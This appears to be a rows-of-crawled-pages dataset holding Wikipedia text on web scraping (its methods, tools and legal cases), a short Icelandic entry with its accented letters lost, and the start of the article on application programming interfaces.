686 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Blog_scraping | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
687 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Human_copy-and-paste | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
688 | https://en.wikipedia.org/wiki/Web_scraping | https://is.wikipedia.org/wiki/Vefs%C3%B6fnun | Vefs fnun nefnist t knileg a fer vi a safna g gnum af vefs um. annig er vissum skilningi hermt eftir eirri mennsku a ger a sko a vefi, anna hvort me v a b a til forrit sem notast vi Hypertext Transfer Protocol-a fer ina e a me v a n ta vafra bor vi Internet Explorer e a Mozilla Firefox. Forrit sem nefnist Heretrix hefur veri r a , upprunalega til ess a safna vefum fyrir Internet Archive en er n nota v a, ar me al af Landsb kasafn slands - H sk lab kasafni. |
689 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Application_programming_interface | An application programming interface (API) is a way for two or more computer programs or components to communicate with each other. It is a type of software interface, offering a service to other pieces of software. 1 A document or standard that describes how to build or use such a connection or interface is called an API specification. A computer system that meets this standard is said to implement or expose an API. The term API may refer either to the specification or to the implementation. Whereas a system's user interface dictates how its end-users interact with the system in question, its API dictates how to write code that takes advantage of that system's capabilities. In contrast to a user interface, which connects a computer to a person, an application programming interface connects computers or pieces of software to each other. It is not intended to be used directly by a person (the end user) other than a computer programmer who is incorporating it into the software. An API is often made up of different parts which act as tools or services that are available to the programmer. A program or a programmer that uses one of these parts is said to call that portion of the API. The calls that make up the API are also known as subroutines, methods, requests, or endpoints. An API specification defines these calls, meaning that it explains how to use or implement them. One purpose of APIs is to hide the internal details of how a system works, exposing only those parts that a programmer will find useful, and keeping them consistent even if the internal details change later. An API may be custom-built for a particular pair of systems, or it may be a shared standard allowing interoperability among many systems. There are APIs for programming languages, software libraries, computer operating systems, and computer hardware. APIs originated in the 1940s, though the term did not emerge until the 1960s and 1970s. Contemporary usage of the term API often refers to web APIs, 2 which allow communication between computers that are joined by the internet. Recent developments in APIs have led to the rise in popularity of microservices, which are loosely coupled services accessed through public APIs. 3 APIs should be versioned. There are two common versioning strategies: 4 In building applications, an API simplifies programming by abstracting the underlying implementation and only exposing objects or actions the developer needs. While a graphical interface for an email client might provide a user with a button that performs all the steps for fetching and highlighting new emails, an API for file input output might give the developer a function that copies a file from one location to another without requiring that the developer understand the file system operations occurring behind the scenes. 5 The term API initially described an interface only for end-user-facing programs, known as application programs. This origin is still reflected in the name "application programming interface. Today, the term is broader, including also utility software and even hardware interfaces. 7 The idea of the API is much older than the term itself. British computer scientists Maurice Wilkes and David Wheeler worked on a modular software library in the 1940s for EDSAC, an early computer. The subroutines in this library were stored on punched paper tape organized in a filing cabinet. This cabinet also contained what Wilkes and Wheeler called a "library catalog" of notes about each subroutine and how to incorporate it into a program. Today, such a catalog would be called an API (or an API specification or API documentation) because it instructs a programmer on how to use (or "call") each subroutine that the programmer needs. 7 Wilkes and Wheeler's 1951 book The Preparation of Programs for an Electronic Digital Computer contains the first published API specification. Joshua Bloch considers that Wilkes and Wheeler "latently invented" the API because it is more of a concept that is discovered than invented. 7 The term "application program interface" (without an ing suffix) is first recorded in a paper called Data structures and techniques for remote computer graphics presented at an AFIPS conference in 1968. 9 7 The authors of this paper use the term to describe the interaction of an application—a graphics program in this case—with the rest of the computer system. A consistent application interface (consisting of Fortran subroutine calls) was intended to free the programmer from dealing with idiosyncrasies of the graphics display device, and to provide hardware independence if the computer or the display were replaced. 8 The term was introduced to the field of databases by C. J. Date 10 in a 1974 paper called The Relational and Network Approaches: Comparison of the Application Programming Interface. 11 An API became a part of the ANSI SPARC framework for database management systems. This framework treated the application programming interface separately from other interfaces, such as the query interface. Database professionals in the 1970s observed these different interfaces could be combined; a sufficiently rich application interface could support the other interfaces as well. 6 This observation led to APIs that supported all types of programming, not just application programming. By 1990, the API was defined simply as "a set of services available to a programmer for performing certain tasks" by technologist Carl Malamud. 12 The idea of the API was expanded again with the dawn of remote procedure calls and web APIs. As computer networks became common in the 1970s and 1980s, programmers wanted to call libraries located not only on their local computers but on computers located elsewhere. These remote procedure calls were well supported by the Java language in particular. In the 1990s, with the spread of the internet, standards like CORBA, COM, and DCOM competed to become the most common way to expose API services. 13 Roy Fielding's dissertation Architectural Styles and the Design of Network-based Software Architectures at UC Irvine in 2000 outlined Representational state transfer (REST) and described the idea of a "network-based Application Programming Interface" that Fielding contrasted with traditional "library-based" APIs. 14 XML and JSON web APIs saw widespread commercial adoption beginning in 2000 and continuing as of 2022. The web API is now the most common meaning of the term API. 2 The Semantic Web proposed by Tim Berners-Lee in 2001 included "semantic APIs" that recasts the API as an open, distributed data interface rather than a software behavior interface. 15 Proprietary interfaces and agents became more widespread than open ones, but the idea of the API as a data interface took hold. Because web APIs are widely used to exchange data of all kinds online, API has become a broad term describing much of the communication on the internet. 13 When used in this way, the term API has overlap in meaning with the term communication protocol. The interface to a software library is one type of API. The API describes and prescribes the "expected behavior" (a specification) while the library is an "actual implementation" of this set of rules. A single API can have multiple implementations (or none, being abstract) in the form of different libraries that share the same programming interface. The separation of the API from its implementation can allow programs written in one language to use a library written in another. For example, because Scala and Java compile to compatible bytecode, Scala developers can take advantage of any Java API. 16 API use can vary depending on the type of programming language involved. An API for a procedural language such as Lua could consist primarily of basic routines to execute code, manipulate data or handle errors while an API for an object-oriented language, such as Java, would provide a specification of classes and its class methods. 17 18 Hyrum's law states that "With a sufficient number of users of an API, it does not matter what you promise in the contract: all observable behaviors of your system will be depended on by somebody. 19 Meanwhile, several studies show that most applications that use an API tend to use a small part of the API. 20 Language bindings are also APIs. By mapping the features and capabilities of one language to an interface implemented in another language, a language binding allows a library or service written in one language to be used when developing in another language. citation needed Tools such as SWIG and F2PY, a Fortran-to-Python interface generator, facilitate the creation of such interfaces. 21 An API can also be related to a software framework: a framework can be based on several libraries implementing several APIs, but unlike the normal use of an API, the access to the behavior built into the framework is mediated by extending its content with new classes plugged into the framework itself. Moreover, the overall program flow of control can be out of the control of the caller and in the framework's hands by inversion of control or a similar mechanism. 22 23 An API can specify the interface between an application and the operating system. 24 POSIX, for example, provides a set of common API specifications that aim to enable an application written for a POSIX conformant operating system to be compiled for another POSIX conformant operating system. Linux and Berkeley Software Distribution are examples of operating systems that implement the POSIX APIs. 25 Microsoft has shown a strong commitment to a backward-compatible API, particularly within its Windows API (Win32) library, so older applications may run on newer versions of Windows using an executable-specific setting called "Compatibility Mode". 26 An API differs from an application binary interface (ABI) in that an API is source code based while an ABI is binary based. For instance, POSIX provides APIs while the Linux Standard Base provides an ABI. 27 28 Remote APIs allow developers to manipulate remote resources through protocols, specific standards for communication that allow different technologies to work together, regardless of language or platform. For example, the Java Database Connectivity API allows developers to query many different types of databases with the same set of functions, while the Java remote method invocation API uses the Java Remote Method Protocol to allow invocation of functions that operate remotely but appear local to the developer. 29 30 Therefore, remote APIs are useful in maintaining the object abstraction in object-oriented programming; a method call, executed locally on a proxy object, invokes the corresponding method on the remote object, using the remoting protocol, and acquires the result to be used locally as a return value. A modification of the proxy object will also result in a corresponding modification of the remote object. 31 Web APIs are a service accessed from client devices (mobile phones, laptops, etc.) to a web server using the Hypertext Transfer Protocol (HTTP). Client devices send a request in the form of an HTTP request, and are met with a response message usually in JavaScript Object Notation (JSON) or Extensible Markup Language (XML) format. Developers typically use Web APIs to query a server for a specific set of data from that server. An example might be a shipping company API that can be added to an eCommerce-focused website to facilitate ordering shipping services and automatically include current shipping rates, without the site developer having to enter the shipper's rate table into a web database. While "web API" historically has been virtually synonymous with web service, the recent trend (so-called Web 2.0) has 